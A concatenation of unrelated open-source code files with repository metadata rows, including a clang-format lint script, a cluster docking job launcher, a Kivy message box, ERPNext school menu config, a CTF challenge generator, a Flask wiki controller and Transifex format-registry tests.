from argparse import ArgumentParser
from multiprocessing import cpu_count
# Get relative imports to work when
# the package is not installed on the PYTHONPATH.
if __name__ == "__main__" and __package__ is None:
sys.path.append(
os.path.dirname(
os.path.dirname(os.path.abspath(os.path.realpath(__file__)))))
##############################################################################
#
# Constants for clang-format
#
#
# Expected version of clang-format
CLANG_FORMAT_VERSION = "10.0.1"
CLANG_FORMAT_SHORT_VERSION = "10.0"
# Name of clang-format as a binary
CLANG_FORMAT_PROGNAME = "clang-format"
# only valid c/c++ implementations and headers
files_match = re.compile('\\.(h|cc|c)$')
##############################################################################
def callo(args):
"""Call a program, and capture its output
"""
return check_output(args).decode('utf-8')
class ClangFormat(object):
"""Class encapsulates finding a suitable copy of clang-format,
and linting/formatting an individual file
"""
def __init__(self, path):
self.path = None
clang_format_progname_ext = ""
if sys.platform == "win32":
clang_format_progname_ext += ".exe"
# Check the clang-format the user specified
if path is not None:
if os.path.isfile(path):
self.path = path
else:
print("WARNING: Could not find clang-format %s" % (path))
# Check the users' PATH environment variable now
if self.path is None:
# Check for various versions staring with binaries with version specific suffixes in the
# user's path
programs = [
CLANG_FORMAT_PROGNAME + "-" + CLANG_FORMAT_VERSION,
CLANG_FORMAT_PROGNAME + "-" + CLANG_FORMAT_SHORT_VERSION,
CLANG_FORMAT_PROGNAME,
]
if sys.platform == "win32":
for i in range(len(programs)):
programs[i] += '.exe'
for program in programs:
self.path = spawn.find_executable(program)
if self.path:
if not self._validate_version():
self.path = None
else:
break
# If Windows, try to grab it from Program Files
# Check both native Program Files and WOW64 version
if sys.platform == "win32":
programfiles = [
os.environ["ProgramFiles"],
os.environ["ProgramFiles(x86)"],
]
for programfile in programfiles:
win32bin = os.path.join(programfile,
"LLVM\\bin\\clang-format.exe")
if os.path.exists(win32bin):
self.path = win32bin
break
if self.path is None or not os.path.isfile(
self.path) or not self._validate_version():
print(
"ERROR:clang-format not found in $PATH, please install clang-format "
+ CLANG_FORMAT_VERSION)
raise NameError("No suitable clang-format found")
self.print_lock = threading.Lock()
def _validate_version(self):
"""Validate clang-format is the expected version
"""
cf_version = callo([self.path, "--version"])
if CLANG_FORMAT_VERSION in cf_version:
return True
print(
"WARNING: clang-format found in path, but incorrect version found at "
+ self.path + " with version: " + cf_version)
return False
def _lint(self, file_name, print_diff):
"""Check the specified file has the correct format
"""
with open(file_name, 'rb') as original_text:
original_file = original_text.read().decode("utf-8")
# Get formatted file as clang-format would format the file
formatted_file = callo([self.path, "--style=file", file_name])
if original_file != formatted_file:
if print_diff:
original_lines = original_file.splitlines()
formatted_lines = formatted_file.splitlines()
result = difflib.unified_diff(original_lines, formatted_lines)
# Take a lock to ensure diffs do not get mixed when printed to the screen
with self.print_lock:
print("ERROR: Found diff for " + file_name)
print("To fix formatting errors, run %s --style=file -i %s"
% (self.path, file_name))
for line in result:
print(line.rstrip())
return False
return True
def lint(self, file_name):
"""Check the specified file has the correct format
"""
return self._lint(file_name, print_diff=True)
def format(self, file_name):
"""Update the format of the specified file
"""
if self._lint(file_name, print_diff=False):
return True
# Update the file with clang-format
formatted = not subprocess.call(
[self.path, "--style=file", "-i", file_name])
# Version 3.8 generates files like foo.cpp~RF83372177.TMP when it formats foo.cpp
# on Windows, we must clean these up
if sys.platform == "win32":
glob_pattern = file_name + "*.TMP"
for fglob in glob.glob(glob_pattern):
os.unlink(fglob)
return formatted
def parallel_process(items, func):
"""Run a set of work items to completion
"""
try:
cpus = cpu_count()
except NotImplementedError:
cpus = 1
task_queue = queue.Queue()
# Use a list so that worker function will capture this variable
pp_event = threading.Event()
pp_result = [True]
def worker():
"""Worker thread to process work items in parallel
"""
while not pp_event.is_set():
try:
item = task_queue.get_nowait()
except queue.Empty:
# if the queue is empty, exit the worker thread
pp_event.set()
return
try:
ret = func(item)
finally:
# Tell the queue we finished with the item
task_queue.task_done()
# Return early if we fail, and signal we are done
if not ret:
# with pp_lock:
# pp_result[0] = False
print("{} failed on item {}".format(func, item))
# pp_event.set()
return
# Enqueue all the work we want to process
for item in items:
task_queue.put(item)
# Process all the work
threads = []
for cpu in range(cpus):
thread = threading.Thread(target=worker)
thread.daemon = True
thread.start()
threads.append(thread)
# Wait for the threads to finish
# Loop with a timeout so that we can process Ctrl-C interrupts
# Note: On Python 2.6 wait always returns None so we check is_set also,
# This works because we only set the event once, and never reset it
while not pp_event.wait(1) and not pp_event.is_set():
time.sleep(1)
for thread in threads:
thread.join()
return pp_result[0]
def get_base_dir():
"""Get the base directory for mongo repo.
This script assumes that it is running in buildscripts/, and uses
that to find the base directory.
"""
try:
return subprocess.check_output(
['git', 'rev-parse', '--show-toplevel']).rstrip().decode('utf-8')
except CalledProcessError:
# We are not in a valid git directory. Use the script path instead.
return os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
def get_repos():
"""Get a list of Repos to check clang-format for
"""
base_dir = get_base_dir()
# Get a list of modules
# GNU Radio is a single-git repo
# paths = [os.path.join(base_dir, MODULE_DIR, m) for m in gnuradio_modules]
paths = [base_dir]
return [Repo(p) for p in paths]
class Repo(object):
"""Class encapsulates all knowledge about a git repository, and its metadata
to run clang-format.
"""
def __init__(self, path):
self.path = path
self.root = self._get_root()
def _callgito(self, args):
"""Call git for this repository, and return the captured output
"""
# These two flags are the equivalent of -C in newer versions of Git
# but we use these to support versions pre 1.8.5 but it depends on the command
# and what the current directory is
return callo([
'git', '--git-dir', os.path.join(self.path, ".git"), '--work-tree',
self.path
] + args)
def _callgit(self, args):
"""Call git for this repository without capturing output
This is designed to be used when git returns non-zero exit codes.
"""
# These two flags are the equivalent of -C in newer versions of Git
# but we use these to support versions pre 1.8.5 but it depends on the command
# and what the current directory is
return subprocess.call([
'git', '--git-dir', os.path.join(self.path, ".git"), '--work-tree',
self.path
] + args)
def _get_local_dir(self, path):
"""Get a directory path relative to the git root directory
"""
if os.path.isabs(path):
return os.path.relpath(path, self.root)
return path
def get_candidates(self, candidates):
"""Get the set of candidate files to check by querying the repository
Returns the full path to the file for clang-format to consume.
"""
if candidates is not None and len(candidates) > 0:
candidates = [self._get_local_dir(f) for f in candidates]
valid_files = list(
set(candidates).intersection(self.get_candidate_files()))
else:
valid_files = list(self.get_candidate_files())
# Get the full file name here
valid_files = [
os.path.normpath(os.path.join(self.root, f)) for f in valid_files
]
return valid_files
def get_root(self):
"""Get the root directory for this repository
"""
return self.root
def _get_root(self):
"""Gets the root directory for this repository from git
"""
gito = self._callgito(['rev-parse', '--show-toplevel'])
return gito.rstrip()
def _git_ls_files(self, cmd):
"""Run git-ls-files and filter the list of files to a valid candidate list
"""
gito = self._callgito(cmd)
# This allows us to pick all the interesting files
# in the mongo and mongo-enterprise repos
file_list = [
line.rstrip()
for line in gito.splitlines()
# TODO: exclude directories if needed
# We don't want to lint volk
if not "volk" in line
]
file_list = [a for a in file_list if files_match.search(a)]
return file_list
def get_candidate_files(self):
"""Query git to get a list of all files in the repo to consider for analysis
"""
return self._git_ls_files(["ls-files", "--cached"])
def get_working_tree_candidate_files(self):
"""Query git to get a list of all files in the working tree to consider for analysis
"""
return self._git_ls_files(["ls-files", "--cached", "--others"])
def get_working_tree_candidates(self):
"""Get the set of candidate files to check by querying the repository
Returns the full path to the file for clang-format to consume.
"""
valid_files = list(self.get_working_tree_candidate_files())
# Get the full file name here
valid_files = [
os.path.normpath(os.path.join(self.root, f)) for f in valid_files
]
return valid_files
def is_detached(self):
"""Is the current working tree in a detached HEAD state?
"""
# symbolic-ref returns 1 if the repo is in a detached HEAD state
return self._callgit(["symbolic-ref", "--quiet", "HEAD"])
def is_ancestor(self, parent, child):
"""Is the specified parent hash an ancestor of child hash?
"""
# merge base returns 0 if parent is an ancestor of child
return not self._callgit(
["merge-base", "--is-ancestor", parent, child])
def is_commit(self, sha1):
"""Is the specified hash a valid git commit?
"""
# cat-file -e returns 0 if it is a valid hash
return not self._callgit(["cat-file", "-e", "%s^{commit}" % sha1])
def is_working_tree_dirty(self):
"""Does the current working tree have changes?
"""
# diff returns 1 if the working tree has local changes
return self._callgit(["diff", "--quiet"])
def does_branch_exist(self, branch):
"""Does the branch exist?
"""
# rev-parse returns 0 if the branch exists
return not self._callgit(["rev-parse", "--verify", branch])
def get_merge_base(self, commit):
"""Get the merge base between 'commit' and HEAD
"""
return self._callgito(["merge-base", "HEAD", commit]).rstrip()
def get_branch_name(self):
"""Get the current branch name, short form
This returns "master", not "refs/head/master"
Will not work if the current branch is detached
"""
branch = self.rev_parse(["--abbrev-ref", "HEAD"])
if branch == "HEAD":
raise ValueError("Branch is currently detached")
return branch
def add(self, command):
"""git add wrapper
"""
return self._callgito(["add"] + command)
def checkout(self, command):
"""git checkout wrapper
"""
return self._callgito(["checkout"] + command)
def commit(self, command):
"""git commit wrapper
"""
return self._callgito(["commit"] + command)
def diff(self, command):
"""git diff wrapper
"""
return self._callgito(["diff"] + command)
def log(self, command):
"""git log wrapper
"""
return self._callgito(["log"] + command)
def rev_parse(self, command):
"""git rev-parse wrapper
"""
return self._callgito(["rev-parse"] + command).rstrip()
def rm(self, command):
"""git rm wrapper
"""
return self._callgito(["rm"] + command)
def show(self, command):
"""git show wrapper
"""
return self._callgito(["show"] + command)
def get_list_from_lines(lines):
""""Convert a string containing a series of lines into a list of strings
"""
return [line.rstrip() for line in lines.splitlines()]
def get_files_to_check_working_tree():
"""Get a list of files to check form the working tree.
This will pick up files not managed by git.
"""
repos = get_repos()
valid_files = list(
itertools.chain.from_iterable(
[r.get_working_tree_candidates() for r in repos]))
return valid_files
def get_files_to_check():
"""Get a list of files that need to be checked
based on which files are managed by git.
"""
repos = get_repos()
valid_files = list(
itertools.chain.from_iterable([r.get_candidates(None) for r in repos]))
return valid_files
def get_files_to_check_from_patch(patches):
"""
Take a patch file generated by git diff,
and scan the patch for a list of files to check.
"""
candidates = []
# Get a list of candidate_files
check = re.compile(
r"^diff --git a\/([a-z\/\.\-_0-9]+) b\/[a-z\/\.\-_0-9]+")
candidates = []
for patch in patches:
if patch == "-":
infile = sys.stdin
else:
infile = open(patch, "rb")
candidates.extend([
check.match(line).group(1) for line in infile.readlines()
if check.match(line)
])
infile.close()
repos = get_repos()
valid_files = list(
itertools.chain.from_iterable(
[r.get_candidates(candidates) for r in repos]))
return valid_files
def _lint_files(clang_format, files):
"""Lint a list of files with clang-format
"""
try:
clang_format = ClangFormat(clang_format)
except NameError as e:
print(e)
return False
lint_clean = parallel_process([os.path.abspath(f) for f in files],
clang_format.lint)
if not lint_clean:
print("ERROR: Code Style does not match coding style")
sys.exit(1)
def lint(args):
"""Lint files command entry point
"""
if args.patch and args.all:
print("Only specify patch or all, but not both!")
return False
if args.patch:
files = get_files_to_check_from_patch(args.patch)
elif args.all:
files = get_files_to_check_working_tree()
else:
files = get_files_to_check()
if files:
_lint_files(args.clang_format, files)
return True
def _format_files(clang_format, files):
"""Format a list of files with clang-format
"""
try:
clang_format = ClangFormat(clang_format)
except NameError as e:
print(e)
return (False)
format_clean = parallel_process([os.path.abspath(f) for f in files],
clang_format.format)
if not format_clean:
print("ERROR: failed to format files")
sys.exit(1)
def _reformat_branch(clang_format, commit_prior_to_reformat,
commit_after_reformat):
"""Reformat a branch made before a clang-format run
"""
try:
clang_format = ClangFormat(clang_format)
except NameError as e:
print(e)
return False
if os.getcwd() != get_base_dir():
raise ValueError("reformat-branch must be run from the repo root")
repo = Repo(get_base_dir())
# Validate that user passes valid commits
if not repo.is_commit(commit_prior_to_reformat):
raise ValueError(
"Commit Prior to Reformat '%s' is not a valid commit in this repo"
% commit_prior_to_reformat)
if not repo.is_commit(commit_after_reformat):
raise ValueError(
"Commit After Reformat '%s' is not a valid commit in this repo" %
commit_after_reformat)
if not repo.is_ancestor(commit_prior_to_reformat, commit_after_reformat):
raise ValueError((
"Commit Prior to Reformat '%s' is not a valid ancestor of Commit After"
+ " Reformat '%s' in this repo") % (commit_prior_to_reformat,
commit_after_reformat))
# Validate the user is on a local branch that has the right merge base
if repo.is_detached():
raise ValueError(
"You must not run this script in a detached HEAD state")
# Validate the user has no pending changes
if repo.is_working_tree_dirty():
raise ValueError(
"Your working tree has pending changes. You must have a clean working tree before proceeding."
)
merge_base = repo.get_merge_base(commit_prior_to_reformat)
if not merge_base == commit_prior_to_reformat:
raise ValueError(
"Please rebase to '%s' and resolve all conflicts before running this script"
% (commit_prior_to_reformat))
# We assume the target branch is master, it could be a different branch if needed for testing
merge_base = repo.get_merge_base("master")
if not merge_base == commit_prior_to_reformat:
raise ValueError(
"This branch appears to already have advanced too far through the merge process"
)
# Everything looks good so lets start going through all the commits
branch_name = repo.get_branch_name()
new_branch = "%s-reformatted" % branch_name
if repo.does_branch_exist(new_branch):
raise ValueError(
"The branch '%s' already exists. Please delete the branch '%s', or rename the current branch."
% (new_branch, new_branch))
commits = get_list_from_lines(
repo.log([
"--reverse", "--pretty=format:%H", "%s..HEAD" %
commit_prior_to_reformat
]))
previous_commit_base = commit_after_reformat
# Go through all the commits the user made on the local branch and migrate to a new branch
# that is based on post_reformat commits instead
for commit_hash in commits:
repo.checkout(["--quiet", commit_hash])
deleted_files = []
# Format each of the files by checking out just a single commit from the user's branch
commit_files = get_list_from_lines(repo.diff(["HEAD~", "--name-only"]))
for commit_file in commit_files:
# Format each file needed if it was not deleted
if not os.path.exists(commit_file):
print(
"Skipping file '%s' since it has been deleted in commit '%s'"
% (commit_file, commit_hash))
deleted_files.append(commit_file)
continue
if files_match.search(commit_file):
clang_format.format(commit_file)
else:
print(
"Skipping file '%s' since it is not a file clang_format should format"
% commit_file)
# Check if anything needed reformatting, and if so amend the commit
if not repo.is_working_tree_dirty():
print("Commit %s needed no reformatting" % commit_hash)
else:
repo.commit(["--all", "--amend", "--no-edit"])
# Rebase our new commit on top the post-reformat commit
previous_commit = repo.rev_parse(["HEAD"])
# Checkout the new branch with the reformatted commits
# Note: we will not name as a branch until we are done with all commits on the local branch
repo.checkout(["--quiet", previous_commit_base])
# Copy each file from the reformatted commit on top of the post reformat
diff_files = get_list_from_lines(
repo.diff([
"%s~..%s" % (previous_commit, previous_commit), "--name-only"
]))
for diff_file in diff_files:
# If the file was deleted in the commit we are reformatting, we need to delete it again
if diff_file in deleted_files:
repo.rm([diff_file])
continue
if "volk" in diff_file:
continue
# The file has been added or modified, continue as normal
file_contents = repo.show(["%s:%s" % (previous_commit, diff_file)])
root_dir = os.path.dirname(diff_file)
if root_dir and not os.path.exists(root_dir):
os.makedirs(root_dir)
with open(diff_file, "w+") as new_file:
new_file.write(file_contents)
repo.add([diff_file])
# Create a new commit onto clang-formatted branch
repo.commit(["--reuse-message=%s" % previous_commit])
previous_commit_base = repo.rev_parse(["HEAD"])
# Create a new branch to mark the hashes we have been using
repo.checkout(["-b", new_branch])
print("reformat-branch is done running.\n")
print(
"A copy of your branch has been made named '%s', and formatted with clang-format.\n"
% new_branch)
print("The original branch has been left unchanged.")
print("The next step is to rebase the new branch on 'master'.")
def format_func(args):
"""Format files command entry point
"""
if args.all and args.branch is not None:
print("Only specify branch or all, but not both!")
return False
if not args.branch:
if args.all:
files = get_files_to_check_working_tree()
else:
files = get_files_to_check()
_format_files(args.clang_format, files)
else:
_reformat_branch(args.clang_format, *args.branch)
def parse_args():
"""
Parse commandline arguments
"""
parser = ArgumentParser()
parser.add_argument(
"-c",
"--clang-format",
default="clang-format",
help="clang-format binary")
subparsers = parser.add_subparsers(help="clang-format action", dest="action")
subparsers.required = True
lint_parser = subparsers.add_parser(
"lint", help="Lint-only (no modifications)")
lint_parser.add_argument("-a", "--all", action="store_true")
lint_parser.add_argument("-p", "--patch", help="patch to check")
lint_parser.set_defaults(func=lint)
format_parser = subparsers.add_parser(
"format", help="Format files in place")
format_parser.add_argument(
"-b",
"--branch",
nargs=2,
default=None,
help="specify the commit hash before the format and after the format has been done"
)
format_parser.add_argument("-a", "--all", action="store_true")
format_parser.set_defaults(func=format_func)
return parser.parse_args()
def main():
"""Main entry point
"""
args = parse_args()
if hasattr(args, "func"):
args.func(args)
if __name__ == "__main__":
main()
| gpl-3.0 | -4,323,851,137,709,461,500 | 31.404848 | 106 | 0.584312 | false |
ruthbrenk/DrugPred2.0 | cl_startdock.py | 1 | 1537 | #!/usr/bin/python
#run as array job
#if files are bzipped -> copy to local disk and unzip there
import os,sys
db_dir = sys.argv[1]
zipped = sys.argv[2] #are files bzipped?
if zipped == 'True':
zipped = True
else:
zipped = False
files = os.listdir(db_dir)
file = '#$ -S /bin/tcsh\n#$ -cwd\n#$ -V\n'
path = os.getcwd()
counter = 1
for i in files: #set up all sub dirs with correct input files
if i[-2:] == 'db' or 'z2':
sub_dir = 'acd_' + str(counter)
if not os.path.exists(sub_dir):
os.system('mkdir ' + sub_dir)
os.chdir(path + '/' + sub_dir)
os.system('cp ../INDOCK .')
command = 'ln -s ' + db_dir + i + ' db_file'
print command
os.system(command)
counter = counter + 1
os.chdir('..')
#create file to submit array job
start_file = open('start_dock.bin', 'w')
start_file.write(file)
start_file.write('cd acd_$SGE_TASK_ID\n')
if zipped: #files must be unzipped, to save diskspace to do this on temporary cluster disk, $TMPDIR
start_file.write('ls -larth *\n') #save name of db file that should be docked
start_file.write('cp db_file $TMPDIR/db_file.db.bz2\n')
start_file.write('bunzip2 $TMPDIR/db_file.db.bz2\n')
start_file.write('unlink db_file\n')
start_file.write('ln -s $TMPDIR/db_file.db db_file\n')
start_file.write('/software/dockenv/bin/Linux/dock_vol.test\n')
if zipped:
start_file.write('unlink db_file\n')
start_file.write('rm -f *.1')
start_file.close()
os.system('chmod 755 start_dock.bin')
os.system('qsub -q 64bit-pri.q,64bit.q -t 1-' + str(counter-1) + ' start_dock.bin')
| gpl-2.0 | 5,979,030,986,141,396,000 | 25.050847 | 100 | 0.659727 | false |
overfl0/Bulletproof-Arma-Launcher | src/view/messagebox.py | 1 | 1628 | # Bulletproof Arma Launcher
# Copyright (C) 2016 Lukasz Taczuk
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
from __future__ import unicode_literals
import sys
from kivy.uix.label import Label
from kivy.uix.button import Button
from kivy.uix.boxlayout import BoxLayout
from utils import browser
from view.chainedpopup import ChainedPopup
default_title = """Message"""
def open_hyperlink(obj, ref):
browser.open_hyperlink(ref)
class MessageBox(ChainedPopup):
def __init__(self, text, title=default_title, markup=False, on_dismiss=None,
hide_button=False, auto_dismiss=True):
bl = BoxLayout(orientation='vertical')
la = Label(text=text, size_hint_y=0.8, markup=markup)
la.bind(on_ref_press=open_hyperlink)
button = Button(text="Ok", size_hint_y=0.2)
button.bind(on_release=self.dismiss)
bl.add_widget(la)
if not hide_button:
bl.add_widget(button)
super(MessageBox, self).__init__(
title=title, content=bl, size_hint=(None, None), size=(600, 500),
auto_dismiss=auto_dismiss)
# Bind an optional handler when the user closes the message
if on_dismiss:
self.bind(on_dismiss=on_dismiss)
| gpl-3.0 | -136,472,453,782,485,700 | 32.22449 | 80 | 0.693489 | false |
VisheshHanda/production_backup | erpnext/config/schools.py | 1 | 3531 | from __future__ import unicode_literals
from frappe import _
def get_data():
return [
{
"label": _("Student"),
"items": [
{
"type": "doctype",
"name": "Student"
},
{
"type": "doctype",
"name": "Guardian"
},
{
"type": "doctype",
"name": "Student Log"
},
{
"type": "doctype",
"name": "Student Group"
},
{
"type": "doctype",
"name": "Student Group Creation Tool"
},
{
"type": "report",
"is_query_report": True,
"name": "Student and Guardian Contact Details",
"doctype": "Program Enrollment"
}
]
},
{
"label": _("Admission"),
"items": [
{
"type": "doctype",
"name": "Student Applicant"
},
{
"type": "doctype",
"name": "Student Admission"
},
{
"type": "doctype",
"name": "Program Enrollment"
},
{
"type": "doctype",
"name": "Program Enrollment Tool"
}
]
},
{
"label": _("Attendance"),
"items": [
{
"type": "doctype",
"name": "Student Attendance"
},
{
"type": "doctype",
"name": "Student Leave Application"
},
{
"type": "doctype",
"name": "Student Attendance Tool"
},
{
"type": "report",
"is_query_report": True,
"name": "Absent Student Report",
"doctype": "Student Attendance"
},
{
"type": "report",
"is_query_report": True,
"name": "Student Batch-Wise Attendance",
"doctype": "Student Attendance"
},
{
"type": "report",
"is_query_report": True,
"name": "Student Monthly Attendance Sheet",
"doctype": "Student Attendance"
}
]
},
{
"label": _("Schedule"),
"items": [
{
"type": "doctype",
"name": "Course Schedule",
"route": "List/Course Schedule/Calendar"
},
{
"type": "doctype",
"name": "Course Scheduling Tool"
}
]
},
{
"label": _("Assessment"),
"items": [
{
"type": "doctype",
"name": "Assessment Plan"
},
{
"type": "doctype",
"name": "Assessment Group",
"link": "Tree/Assessment Group",
},
{
"type": "doctype",
"name": "Assessment Result"
},
{
"type": "doctype",
"name": "Grading Scale"
},
{
"type": "doctype",
"name": "Assessment Criteria"
},
{
"type": "doctype",
"name": "Assessment Criteria Group"
},
{
"type": "doctype",
"name": "Assessment Result Tool"
}
]
},
{
"label": _("Fees"),
"items": [
{
"type": "doctype",
"name": "Fees"
},
{
"type": "doctype",
"name": "Fee Structure"
},
{
"type": "doctype",
"name": "Fee Category"
},
{
"type": "report",
"name": "Student Fee Collection",
"doctype": "Fees",
"is_query_report": True
}
]
},
{
"label": _("Setup"),
"items": [
{
"type": "doctype",
"name": "Course"
},
{
"type": "doctype",
"name": "Program"
},
{
"type": "doctype",
"name": "Instructor"
},
{
"type": "doctype",
"name": "Room"
},
{
"type": "doctype",
"name": "Student Category"
},
{
"type": "doctype",
"name": "Student Batch Name"
},
{
"type": "doctype",
"name": "Academic Term"
},
{
"type": "doctype",
"name": "Academic Year"
},
{
"type": "doctype",
"name": "School Settings"
}
]
},
]
| gpl-3.0 | -761,279,693,771,877,400 | 16.057971 | 52 | 0.450297 | false |
DISMGryphons/GryphonCTF2017-Challenges | challenges/programming/AutoEncryptSys/generate/make.py | 1 | 1166 | from Crypto.Cipher import AES
import base64
import random
k="../distrib/"
def randomword(length):
return ''.join(random.choice("QWERTYUIOPASDFGHJKLZXCVBNM1234567890__________") for i in range(length))
def randomword1():
return ''.join(random.choice("QWERTYUIOPLKJHGFDSAZXCVBNM") for i in range(4))
def filename():
return ''.join(random.choice("asdfghjklzxcvbnmqwertyuiopQWERTYUIOPASDFGHJKLZXCVBNM") for i in range(16))
def encrypt(msg_text,secret_key):
msg_text = msg_text.rjust(32)
cipher = AES.new(secret_key,AES.MODE_ECB) # never use ECB in strong systems obviously
encoded = base64.b64encode(cipher.encrypt(msg_text))
return encoded.decode("utf-8")
# ...
def decrypt(msg_text,secret_key):
cipher = AES.new(secret_key,AES.MODE_ECB) # never use ECB in strong systems obviously
decoded = cipher.decrypt(base64.b64decode(msg_text))
return decoded
for i in range(1002):
zz=filename()
f=open(k+zz,"w")
D=randomword1()
while D=="GCTF":
D=randomword1()
j=D+"{"+randomword(random.randint(17,25))+"}"
if i==459:
j="GCTF{wh4ts_1n_th3_f1l355}"
print (encrypt(j,zz))
print(zz)
print()
print(encrypt(j,zz),file=f)
| gpl-3.0 | 4,262,148,654,617,338,000 | 28.15 | 107 | 0.702401 | false |
amcgregor/WebCore-Tutorial | web/app/wiki/root.py | 1 | 2314 | # Python's standard date + time object.
from datetime import datetime
# HTTP status code exception for "302 Found" redirection.
from webob.exc import HTTPFound
# MongoDB exceptions that may be raised when manipulating data.
from pymongo.errors import DuplicateKeyError
# Get a reference to our Article resource class and data model.
from .article import Article
from .model import WikiArticle as D # Shortened due to to repeated use.
class Wiki:
"""Basic multi-article editable wiki."""
__dispatch__ = 'resource' # The Wiki is a collection of pages, so use resource dispatch.
__resource__ = Article # Declare the type of resource we contain.
__collection__ = 'articles' # The default collection name to use when bound.
__home__ = 'Home' # The default homepage users are directed to if requesting the root.
def __init__(self, context, collection=None, record=None):
"""Executed when the root of the site (or children) are accessed, on each request."""
self._ctx = context # Store the "request context" for later use.
self.__collection__ = context.db[self.__collection__] # Get a reference to the collection we use.
def __getitem__(self, name):
"""Load data for the Article with the given name."""
# Attempt to locate a document by that name.
data = self.__collection__.find_one(D.name == name)
if not data: # If no record was found, populate some default data.
data = D(name) # Creation and modification times are constructed for us.
else:
data = D.from_mongo(data) # Otherwise, wrap in our model object.
return data
def get(self):
"""Called to handle direct requests to the web root itself."""
# Redirect users to the default home page.
return HTTPFound(location=str(self._ctx.path.current / self.__home__))
def post(self, name, content):
"""Save a new article to the database."""
try:
# Insert an article with the given name and content.
result = self.__collection__.insert_one(D(name, content))
except DuplicateKeyError:
return {
'ok': False,
'reason': 'duplicate',
'message': "An article with that name already exists.",
'name': name,
}
# All is well, so we inform the client.
return {
'ok': True,
'acknowledged': result.acknowledged,
'name': result.inserted_id
}
| mit | -5,330,814,030,077,170,000 | 32.536232 | 100 | 0.689283 | false |
tymofij/adofex | transifex/resources/tests/lib/registry.py | 1 | 5211 | # -*- coding: utf-8 -*-
from mock import Mock
from django.utils import unittest
from django.conf import settings
from transifex.resources.formats.registry import registry, _FormatsRegistry
from transifex.resources.formats.pofile import POHandler, POTHandler
from transifex.txcommon.tests.base import BaseTestCase
class TestRegistry(BaseTestCase):
def setUp(self):
super(TestRegistry, self).setUp()
methods = {
'PO': {
'description': 'PO file handler',
'file-extensions': '.po, .pot',
'mimetype': 'text/x-po, application/x-gettext, application/x-po',
}, 'QT': {
'description': 'Qt Files',
'mimetype': 'application/xml',
'file-extensions': '.ts'
},
}
handlers = {
'PO': 'resources.formats.pofile.POHandler',
'QT': 'resources.formats.qt.LinguistHandler',
}
self.registry = _FormatsRegistry(methods=methods, handlers=handlers)
def test_register(self):
from transifex.resources.formats.joomla import JoomlaINIHandler
self.registry.add_handler('INI', JoomlaINIHandler)
self.assertEquals(len(self.registry.handlers.keys()), 3)
self.assertIn('INI', self.registry.handlers.keys())
j = self.registry.handler_for('INI')
self.assertIsInstance(j, JoomlaINIHandler)
def test_extensions(self):
extensions = self.registry.extensions_for('PO')
self.assertEquals(len(extensions), 2)
self.assertEquals(extensions[0], '.po')
self.assertEquals(extensions[1], '.pot')
def test_mimetypes(self):
mimetypes = self.registry.mimetypes_for('PO')
self.assertEquals(len(mimetypes), 3)
self.assertEquals(mimetypes[0], 'text/x-po')
self.assertEquals(mimetypes[1], 'application/x-gettext')
self.assertEquals(mimetypes[2], 'application/x-po')
class TestAppropriateHandler(unittest.TestCase):
"""Test the process of finding the appropriate handler in
various situations.
"""
@classmethod
def setUpClass(cls):
cls.appropriate_handler = registry.appropriate_handler
def test_normal_types(self):
for method in settings.I18N_METHODS:
if method not in ('PO', 'POT', ):
resource = Mock()
resource.__dict__['i18n_type'] = method
handler = self.appropriate_handler(resource, None)
self.assertIsInstance(
handler, type(registry.handler_for(method))
)
def test_get(self):
resource = Mock()
resource.__dict__['i18n_type'] = 'PO'
resource.source_language = 'en'
handler = self.appropriate_handler(resource, None)
self.assertIsInstance(handler, POTHandler)
handler = self.appropriate_handler(resource, 'en')
self.assertIsInstance(handler, POHandler)
handler = self.appropriate_handler(resource, 'el')
self.assertIsInstance(handler, POHandler)
def test_save(self):
resource = Mock()
resource.__dict__['i18n_type'] = 'PO'
resource.source_language = 'en'
filename = 'f.po'
handler = self.appropriate_handler(resource, None, filename=filename)
self.assertIsInstance(handler, POHandler)
handler = self.appropriate_handler(resource, 'en', filename=filename)
self.assertIsInstance(handler, POHandler)
handler = self.appropriate_handler(resource, 'el', filename=filename)
self.assertIsInstance(handler, POHandler)
filename = 'f.pot'
handler = self.appropriate_handler(resource, None, filename=filename)
self.assertIsInstance(handler, POTHandler)
handler = self.appropriate_handler(resource, 'en', filename=filename)
self.assertIsInstance(handler, POTHandler)
handler = self.appropriate_handler(resource, 'el', filename=filename)
self.assertIsInstance(handler, POTHandler)
class TestFileExtensions(unittest.TestCase):
"""Test the file extensions used."""
def setUp(self):
self.resource = Mock()
self.resource.source_language = 'en'
def test_extensions(self):
for method in registry.available_methods:
if method == 'POT':
continue
self.resource.i18n_method = method
correct_extensions = registry.extensions_for(method)
for lang in ('en', 'el'):
extension_returned = registry.file_extension_for(
self.resource, lang
)
self.assertIn(extension_returned, correct_extensions)
def test_po_extensions(self):
"""Test PO/POT extensions.
If language is None: extension == 'pot'.
"""
self.resource.i18n_method = 'PO'
for lang in ('en', 'el', None):
extension = registry.file_extension_for(self.resource, lang)
if lang is None:
self.assertEqual(extension, registry.extensions_for('POT')[0])
else:
self.assertEqual(extension, registry.extensions_for('PO')[0])
| gpl-3.0 | -3,526,764,267,284,433,400 | 37.036496 | 81 | 0.61754 | false |
timesqueezer/mdfork | mooddiary/bundles.py | 1 | 1999 | from flask.ext.assets import Bundle
js = Bundle(
'bower_components/jquery/dist/jquery.js',
'bower_components/angular/angular.js',
'bower_components/angular-animate/angular-animate.js',
'bower_components/angular-cookies/angular-cookies.js',
'bower_components/angular-sanitize/angular-sanitize.js',
'bower_components/angular-localization/angular-localization.js',
'bower_components/angular-ui-router/release/angular-ui-router.js',
'bower_components/angular-grecaptcha/grecaptcha.js',
'bower_components/underscore/underscore.js',
'bower_components/angular-strap/dist/angular-strap.js',
'bower_components/angular-strap/dist/angular-strap.tpl.js',
'bower_components/Chart.js/Chart.js',
'bower_components/angular-chart.js/dist/angular-chart.js',
'bower_components/bootstrap/js/alert.js',
'bower_components/bootstrap/js/modal.js',
'bower_components/bootstrap/js/dropdown.js',
'bower_components/bootstrap/js/collapse.js',
'bower_components/angular-restmod/dist/angular-restmod-bundle.js',
'bower_components/angular-restmod/dist/plugins/dirty.js',
'bower_components/ngInfiniteScroll/build/ng-infinite-scroll.js',
'bower_components/ngSmoothScroll/lib/angular-smooth-scroll.js',
'bower_components/moment/moment.js',
